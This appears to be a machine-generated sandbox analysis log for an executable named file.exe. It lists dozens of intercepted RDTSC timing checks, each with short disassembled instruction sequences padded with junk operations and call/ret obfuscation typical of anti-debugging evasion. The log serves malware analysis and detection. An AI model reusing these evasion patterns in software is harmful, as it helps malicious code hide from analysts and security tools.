                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA156 second address: 9FA164 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F0B08CB6D16h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA448 second address: 9FA44E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA726 second address: 9FA750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B08CB6D1Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0B08CB6D25h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC179 second address: 9FC183 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0B09070BCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC183 second address: 9FC1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F0B08CB6D27h 0x0000000e push 00000000h 0x00000010 jmp 00007F0B08CB6D1Bh 0x00000015 push ADCCDBEDh 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F0B08CB6D23h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC1CA second address: 9FC26E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 52332493h 0x00000011 mov ecx, dword ptr [ebp+122D2B68h] 0x00000017 push 00000003h 0x00000019 jmp 00007F0B09070BD7h 0x0000001e push 00000000h 0x00000020 mov ch, FCh 0x00000022 push 00000003h 0x00000024 push edx 0x00000025 xor dword ptr [ebp+122D28D6h], edx 0x0000002b pop esi 0x0000002c call 00007F0B09070BD9h 0x00000031 jnl 00007F0B09070BC8h 0x00000037 pop edi 0x00000038 call 00007F0B09070BC9h 0x0000003d jmp 00007F0B09070BD7h 0x00000042 push eax 0x00000043 push eax 0x00000044 push ebx 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 pop ebx 0x00000048 pop eax 0x00000049 mov eax, dword ptr [esp+04h] 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 pop edx 0x00000051 pop eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F0B09070BD2h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC4B0 second address: 9FC4B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC4B5 second address: 9FC4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 4DDEF6C5h 0x0000000e movzx esi, bx 0x00000011 lea ebx, dword ptr [ebp+1244E084h] 0x00000017 mov dword ptr [ebp+122D220Fh], esi 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F0B09070BCDh 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC4E6 second address: 9FC4EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FC4EB second address: 9FC508 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0B09070BD8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F35F4 second address: 9F35FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F35FC second address: 9F3610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B09070BCEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C46C second address: A1C470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C5EF second address: A1C61D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0B09070BD2h 0x00000008 jmp 00007F0B09070BD3h 0x0000000d pop esi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1C79D second address: A1C7F2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0B08CB6D22h 0x00000012 jmp 00007F0B08CB6D28h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a pop edx 0x0000001b pushad 0x0000001c jmp 00007F0B08CB6D21h 0x00000021 jo 00007F0B08CB6D1Eh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1CC21 second address: A1CC3B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0B09070BD4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1CC3B second address: A1CC40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1CC40 second address: A1CC46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1CC46 second address: A1CC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0B08CB6D22h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D07B second address: A1D0D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F0B09070BD9h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F0B09070BD1h 0x00000015 pushad 0x00000016 jp 00007F0B09070BC6h 0x0000001c jmp 00007F0B09070BCDh 0x00000021 jnp 00007F0B09070BC6h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c jbe 00007F0B09070BC6h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D215 second address: A1D243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F0B08CB6D29h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F0B08CB6D16h 0x00000014 jp 00007F0B08CB6D16h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D3B8 second address: A1D3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F0B09070BD1h 0x0000000b jmp 00007F0B09070BCBh 0x00000010 jmp 00007F0B09070BCCh 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D3E0 second address: A1D3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D3E6 second address: A1D405 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0B09070BD6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1D590 second address: A1D5AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E7965 second address: 9E796B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E796B second address: 9E7996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0B08CB6D1Dh 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F0B08CB6D24h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DCE4 second address: A1DCF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 jo 00007F0B09070BCCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1DCF3 second address: A1DCF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E170 second address: A1E1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B09070BCCh 0x00000009 popad 0x0000000a jno 00007F0B09070BDDh 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F0B09070BC6h 0x00000018 jmp 00007F0B09070BD2h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E45B second address: A1E461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E461 second address: A1E46B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0B09070BC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1E46B second address: A1E474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A229C7 second address: A229D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0B09070BC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EB02A second address: 9EB04F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F0B08CB6D16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0B08CB6D26h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AA68 second address: A2AA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F0B09070BC6h 0x0000000e jc 00007F0B09070BC6h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AA7D second address: A2AAA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0B08CB6D16h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F0B08CB6D22h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AAA1 second address: A2AAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AC47 second address: A2AC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AC4F second address: A2AC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AC57 second address: A2AC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B08CB6D26h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AC77 second address: A2AC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007F0B09070BCCh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AEFA second address: A2AF14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B08CB6D1Fh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2AF14 second address: A2AF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0B09070BC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B4B7 second address: A2B4BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2B4BB second address: A2B4C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F991 second address: A2F995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F995 second address: A2F9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2F9A1 second address: A2F9AB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B08CB6D16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A301B8 second address: A301E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F0B09070BD8h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F0B09070BCCh 0x00000014 jne 00007F0B09070BC6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30D0C second address: A30D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jns 00007F0B08CB6D1Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F0B08CB6D18h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30D29 second address: A30D2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30F3E second address: A30F48 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0B08CB6D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A30F48 second address: A30F56 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3175D second address: A317C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 jbe 00007F0B08CB6D18h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F0B08CB6D18h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 mov esi, dword ptr [ebp+122D39DDh] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f jmp 00007F0B08CB6D1Eh 0x00000044 push eax 0x00000045 push ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A317C6 second address: A317CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A321C6 second address: A321CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A32042 second address: A3205F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B09070BD9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3205F second address: A32063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33193 second address: A3319F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3319F second address: A33201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F0B08CB6D18h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov edi, ebx 0x00000023 push 00000000h 0x00000025 mov esi, 0B828466h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F0B08CB6D18h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 or esi, dword ptr [ebp+122D1CB4h] 0x0000004c xchg eax, ebx 0x0000004d pushad 0x0000004e js 00007F0B08CB6D1Ch 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33C3E second address: A33C48 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A339A5 second address: A339A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A33C48 second address: A33C61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F0B09070BC6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A343EF second address: A343F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A343F4 second address: A343FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38B07 second address: A38B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38B0B second address: A38B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A35888 second address: A3588C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36239 second address: A36253 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0B09070BCEh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A36D8E second address: A36D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C0FA second address: A3C119 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0B09070BD2h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C119 second address: A3C12D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B08CB6D20h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C12D second address: A3C18F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B09070BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1BF3h], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F0B09070BC8h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f jmp 00007F0B09070BD5h 0x00000034 or bx, 3B34h 0x00000039 push 00000000h 0x0000003b mov ebx, 455370E1h 0x00000040 xchg eax, esi 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push ebx 0x00000046 pop ebx 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C18F second address: A3C19D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B08CB6D1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3B3CB second address: A3B3CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C2F4 second address: A3C2F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D16F second address: A3D173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3D173 second address: A3D177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C3F0 second address: A3C3F5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3C3F5 second address: A3C416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F0B08CB6D1Bh 0x00000010 jmp 00007F0B08CB6D1Ah 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A3E254 second address: A3E2D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B09070BD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F0B09070BC8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D58CBh], edi 0x00000031 push eax 0x00000032 pushad 0x00000033 pushad 0x00000034 jmp 00007F0B09070BD1h 0x00000039 jg 00007F0B09070BC6h 0x0000003f popad 0x00000040 pushad 0x00000041 jmp 00007F0B09070BD3h 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4029D second address: A402A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
